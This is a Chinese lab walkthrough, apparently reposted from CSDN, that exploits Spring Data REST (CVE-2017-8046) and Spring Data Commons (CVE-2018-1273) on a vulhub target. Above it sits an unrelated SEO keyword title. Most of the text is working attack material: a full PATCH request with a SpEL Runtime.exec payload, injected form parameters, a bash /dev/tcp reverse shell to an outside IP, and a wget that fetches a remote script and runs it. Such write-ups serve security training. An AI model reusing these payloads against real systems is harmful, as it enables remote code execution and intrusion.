您的位置:首页 > 教育 > 锐评 > 数字创意设计包括哪些工具_上海将打造五大未来产业集群_长沙seo网络营销推广_seo网站优化软件

数字创意设计包括哪些工具_上海将打造五大未来产业集群_长沙seo网络营销推广_seo网站优化软件

2025/3/27 19:17:06 来源:https://blog.csdn.net/2301_78554096/article/details/146487651  浏览:    关键词:数字创意设计包括哪些工具_上海将打造五大未来产业集群_长沙seo网络营销推广_seo网站优化软件
数字创意设计包括哪些工具_上海将打造五大未来产业集群_长沙seo网络营销推广_seo网站优化软件

Spring Data Rest 远程(CVE-2017-8046)

vulhub/spring/CVE-2017-8046

访问http://39.105.61.160:8080/customers/1

 使用Burp,抓取数据包

 发送到重放器,修改代码

PATCH /customers/1 HTTP/1.1
Host: 39.105.61.160:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=43E63C2CE6B221D29E4E404AB7179C0D
Upgrade-Insecure-Requests: 1
If-Modified-Since: Mon, 24 Mar 2025 06:45:11 GMT
If-None-Match: "0"
Priority: u=0, i
Content-Type:  application/json-patch+json
Content-Length: 201

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value":
"vulhub" }]

 修改为自己的ip

其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11
5} 表示的命令 touch /tmp/success,创建一个success文件

成功发送数据包之后,可以进⼊docker容器内查看是否执⾏命令

在容器中发现成功创建success

docker ps  

docker exec -it ebf783d6cae2 /bin/bash

ls /tmp

spring 代码执⾏ (CVE-2018-1273)

Spring Data ⼀个于简化数据访持云服务的开源框架Spring Data Commons Spring Data 所有⽬共框架Spring Data Commons 2.0.5 版本中SpEL 达式注漏洞攻击者可以注恶意 SpEL 达式以执任意命令。

 访问靶场地址:http://39.105.61.160:8080/users

随便输入数据,使用Burp抓包

 发送到重放器,修改代码

 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t ouch /tmp/crz")]=&password=&repeatedPassword=

 可以看到功写⼊

docker ps

docker exec -it 7eda9043f543 /bin/bash

ls /tmp

反弹shell 

云服⼀个 反弹shell 

bash -i >& /dev/tcp/39.105.61.160:6666 0>&1

 监听6666端口

 

 将刚才的代码修改

 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/usr/bin/wget -qO /tmp/shell.sh http://39.105.61.160/1.sh")]=&password=&repeatedPassword=

 shell.sh成功建立

 再次修改(运行shell.php)

 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/bin/bash /tmp/shell.sh")]=&password=&repeatedPassword=

之后监听到shell,反弹shell完成 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com